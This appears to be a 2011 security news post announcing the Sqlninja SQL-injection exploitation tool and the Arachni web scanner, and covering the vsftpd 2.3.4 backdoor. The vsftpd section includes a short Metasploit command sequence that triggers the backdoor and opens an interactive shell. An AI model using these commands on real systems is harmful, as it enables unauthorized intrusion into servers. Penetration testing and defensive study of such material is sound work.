Tuesday, 5. July 2011
Sqlninja v.0.2.6-rc1 Linux
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Sqlninja is written in Perl and should run on any UNIX-based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
- Linux
- FreeBSD
- Mac OS X

It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:

- ICMP-based shell
- CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
- Header-based injection support

Download:
http://sqlninja.sourceforge.net/download.html

Arachni v0.2.4 Security Scanner Linux
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.
The main focus of this release has been on taking care of some pesky bugs and implementing a few feature requests.

Download: https://github.com/Zapotek/arachni

See Changelog: http://arachni.segfault.gr

Video Demonstration: Vsftpd backdoor
Affected versions:
vsftpd-2.3.4 from 2011-06-30

https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5

Metasploit demo:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded

Discovered by Mathias Kresin
